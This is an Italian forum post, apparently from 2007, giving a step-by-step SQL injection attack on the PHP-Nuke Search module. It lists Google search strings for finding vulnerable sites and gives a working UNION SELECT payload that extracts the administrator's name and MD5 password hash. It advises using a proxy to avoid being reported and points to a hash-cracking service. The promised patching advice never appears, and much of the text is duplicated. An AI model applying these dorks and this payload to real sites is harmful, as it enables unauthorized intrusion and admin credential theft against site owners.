- 29 Maggio 2007
- 2.253
- 0
- Miglior risposta
- 0
In questa guida vi spiegherò come si attua l'SQL Injection sul modulo Search di
un PHPNUKE e come patchare i vulnerabili!!!
Per prima cosa dobbiamo trovare il PHPNUKE vulnerabile a questo tipo di SQL Injection, quindi andiamo su google e scriviamo una delle seguenti frasi:
"Powered by PhpNuke"
"allinurl:phpnuke/modules.php?name=Search"
"allinurl:html/modules.php?name=Search"
"inurl:modules.php?name=Search"
Una volta trovato il sito vulnerabile, apriremo il modulo Search, per vedere se è attivo...
Per aprire il modulo Search, in mancanza del link, basta aggiungere "modules.php?name=Search"
al phpnuke installato, ad esempio "www.sito.com/phpnuke/modules.php?name=Search" (senza apici).
Una volta aperto il modulo Search,OVVIAMENTE PROXATI(senò scoprono il vostro IP e vi possono denunciare), inseriamo la seguente stringa
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
una volta inserita, clicchiamo INVIO, e vediamo il risultato...
Se il sito è vulnerabile al bug, visualizzeremo risultati del tipo
d708cf4edf867f03e5fc2f510912fab1
Contributo di "nome dell admin"
Postato da 2 il Giovedì, 01 gennaio 2006 ore 12:40
Argomento: (9 Commenti)
dove "d708cf4edf867f03e5fc2f510912fab1" sarà la password criptata in formato MD5, e
"nome dell admin" sarà il nick dell'amministratore...
Ora il problema sarà... Come crackare la password in formato MD5?
Facile.. basta andare su
Fonte: MIA (posate qui in sciax2 e in italiancheart)
Vi ricordo che questa giude e solo a scopo INFORMATICO
un PHPNUKE e come patchare i vulnerabili!!!
Per prima cosa dobbiamo trovare il PHPNUKE vulnerabile a questo tipo di SQL Injection, quindi andiamo su google e scriviamo una delle seguenti frasi:
"Powered by PhpNuke"
"allinurl:phpnuke/modules.php?name=Search"
"allinurl:html/modules.php?name=Search"
"inurl:modules.php?name=Search"
Una volta trovato il sito vulnerabile, apriremo il modulo Search, per vedere se è attivo...
Per aprire il modulo Search, in mancanza del link, basta aggiungere "modules.php?name=Search"
al phpnuke installato, ad esempio "www.sito.com/phpnuke/modules.php?name=Search" (senza apici).
Una volta aperto il modulo Search,OVVIAMENTE PROXATI(senò scoprono il vostro IP e vi possono denunciare), inseriamo la seguente stringa
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
una volta inserita, clicchiamo INVIO, e vediamo il risultato...
Se il sito è vulnerabile al bug, visualizzeremo risultati del tipo
d708cf4edf867f03e5fc2f510912fab1
Contributo di "nome dell admin"
Postato da 2 il Giovedì, 01 gennaio 2006 ore 12:40
Argomento: (9 Commenti)
dove "d708cf4edf867f03e5fc2f510912fab1" sarà la password criptata in formato MD5, e
"nome dell admin" sarà il nick dell'amministratore...
Ora il problema sarà... Come crackare la password in formato MD5?
Facile.. basta andare su
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
inserite il codice del bug e vi dirà la password dell adminFonte: MIA (posate qui in sciax2 e in italiancheart)
Vi ricordo che questa giude e solo a scopo INFORMATICO
